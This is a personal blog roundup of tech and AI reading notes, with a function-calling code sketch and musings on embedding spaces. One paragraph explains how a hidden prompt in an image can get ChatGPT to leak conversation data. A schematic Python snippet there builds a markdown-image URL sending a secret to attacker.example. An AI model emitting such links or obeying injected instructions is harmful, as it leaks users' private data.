Here are some things that I read over the last few weeks that I found interesting, or that I learned something from.
Benedict Evans’s latest newsletter: https://newsletters.feedbinusercontent.com/de8/de8e11d8b69e568a52963c89d86e8b3d3ed837c9.html This newsletter is always worth reading. Key points from this one:
- Managing internet scale is hard, particularly around moderation. We often think in terms of use cases that we know and understand, but web scale introduces new dynamics. In a way, scholarly publishing is a web scale enterprise, but one that is not centrally controlled.
- Fear of AI apocalypse should recede in 2024. That’s my own position too; I’m probably more of an accelerationist, certainly not a doomster.
- Really novel problems and opportunities around LLMs are starting to emerge, beyond just coding and marketing.
On that last point, this post covers a significant new collaboration between Isomorphic Labs (a DeepMind spinoff) and the pharma companies Eli Lilly and Novartis, which could be worth multiple billions, essentially to accelerate drug discovery. https://techcrunch.com/2024/01/07/isomorphic-inks-deals-with-eli-lilly-and-novartis-for-drug-discovery/
Function calling significantly increases GPT performance; a detailed guide is given here. It is not something that most people who prompt do today; it could become a critical skill in 2024, or it could be subsumed into some product layer. https://minimaxir.com/2023/12/chatgpt-structured-data/
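For flavour, here is a minimal sketch of the technique using the OpenAI Python SDK (v1 style). The `record_summary` schema, model choice, and prompt are illustrative assumptions on my part, not taken from the linked guide:

```python
import json
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

# A hypothetical function schema: instead of answering in free prose, the
# model must "call" this function with JSON arguments matching the schema.
tools = [{
    "type": "function",
    "function": {
        "name": "record_summary",
        "description": "Record a structured summary of the user's text.",
        "parameters": {
            "type": "object",
            "properties": {
                "topic": {"type": "string"},
                "sentiment": {"type": "string",
                              "enum": ["positive", "neutral", "negative"]},
                "key_points": {"type": "array", "items": {"type": "string"}},
            },
            "required": ["topic", "sentiment", "key_points"],
        },
    },
}]

response = client.chat.completions.create(
    model="gpt-3.5-turbo",
    messages=[{"role": "user",
               "content": "Summarise: LLM-assisted drug discovery deals are accelerating."}],
    tools=tools,
    # Force the model to respond via the function rather than in prose.
    tool_choice={"type": "function", "function": {"name": "record_summary"}},
)

# The answer comes back as machine-parseable JSON arguments, not prose.
args = json.loads(response.choices[0].message.tool_calls[0].function.arguments)
print(args["topic"], args["key_points"])
```

The win is that the schema constrains the output, so downstream code can parse the response without fragile prompt engineering.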
GPT can have data exfiltrated via a hidden prompt in an image, and OpenAI is starting to look at how to tackle this. The point is less the specific mitigation and more that this kind of data-leak risk is real. https://simonwillison.net/2023/Dec/21/openai-begins-tackling-chatgpt-data-leak-vulnerability/#atom-everything
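To make the risk concrete, the attack class Simon Willison describes works roughly like this: injected instructions (hidden in an image, a web page, or a document) get the model to emit a markdown image whose URL carries conversation data, and the chat client leaks that data when it fetches the image. A schematic sketch, with a hypothetical attacker domain:

```python
from urllib.parse import quote

# Schematic only: the shape of a markdown-image exfiltration payload.
# If injected instructions persuade the model to emit this string, the
# chat client fetches the "image" and the secret leaves in the query string.
secret = "earlier conversation contents the attacker wants"
payload = f"![loading](https://attacker.example/log?q={quote(secret)})"
print(payload)
```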
Hiring slowdown in tech in 2023 in the US (https://www.techmeme.com/240106/p3#a240106p3). On the one hand, the slowdown in hiring of new engineers is remarkable. On the other hand, given the large unwinding of roles at big tech in the US over the last two years, it’s almost surprising that this number has not gone into reverse. Meanwhile, high-skilled visa numbers in the US jumped by about 30%: https://marginalrevolution.com/marginalrevolution/2023/12/u-s-high-skilled-immigration.html
One downside of LLMs at the moment: they make it easier to create realistic-looking crap, and things like bug bounty programs are suffering as a result. https://daniel.haxx.se/blog/2024/01/02/the-i-in-llm-stands-for-intelligence/
Quick thought of the week: given that LLMs operate over vector spaces (embeddings), and a vector space allows arbitrary combinations of points to be formed within it:
- Could a set of combinations of items be mapped into a density estimate over the space, to determine whether certain kinds of combinations are more or less likely, and if so, could you invert that density to surface something useful? (A toy sketch follows this list.)
- Discovery in science often comes from combinations of existing knowledge. If we can map abstract data from a particular domain into a vector space, does this become an engine for prospecting potential new avenues of knowledge, and moreover, does it open up a new pillar of the scientific method?
- A mathematical construct does not need to be tied to the constraints of the world, so any new proto-knowledge created with this method still needs to be grounded by a verification step of some kind. What will the balance be between mining for potential new areas of knowledge and then verifying them, versus verifying first and only exploring outward from verified points of our knowledge space?
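As a toy version of the first bullet: embed known concepts, represent a combination as a simple vector composition, fit a density model over the combinations already seen, and rank unseen combinations by how unlikely they look. Everything here is an illustrative assumption (random vectors stand in for real embeddings; mean-pooling and a Gaussian KDE are arbitrary choices):

```python
import numpy as np
from sklearn.neighbors import KernelDensity

rng = np.random.default_rng(0)

# Hypothetical setup: each row stands in for the embedding of a known
# concept; a real version would use an embedding model instead.
concepts = rng.normal(size=(200, 32))           # 200 concepts, 32-dim

# Represent a "combination" of two concepts as the mean of their vectors
# (one simple choice; sums or learned compositions would also work).
idx = rng.integers(0, len(concepts), size=(500, 2))
known_combos = concepts[idx].mean(axis=1)       # combinations we've seen

# Fit a density model over the combinations we already know about.
kde = KernelDensity(kernel="gaussian", bandwidth=0.8).fit(known_combos)

# Score candidate pairings; low density = a combination unlike anything
# in the known set, i.e. a candidate worth prospecting (and verifying).
cand_idx = rng.integers(0, len(concepts), size=(1000, 2))
candidates = concepts[cand_idx].mean(axis=1)
scores = kde.score_samples(candidates)          # log-density per candidate

novel = cand_idx[np.argsort(scores)[:10]]       # 10 least likely pairings
print("Candidate novel combinations (concept index pairs):\n", novel)
```

The expensive part, per the last bullet, is not generating these candidates but verifying whether any low-density pairing corresponds to something real.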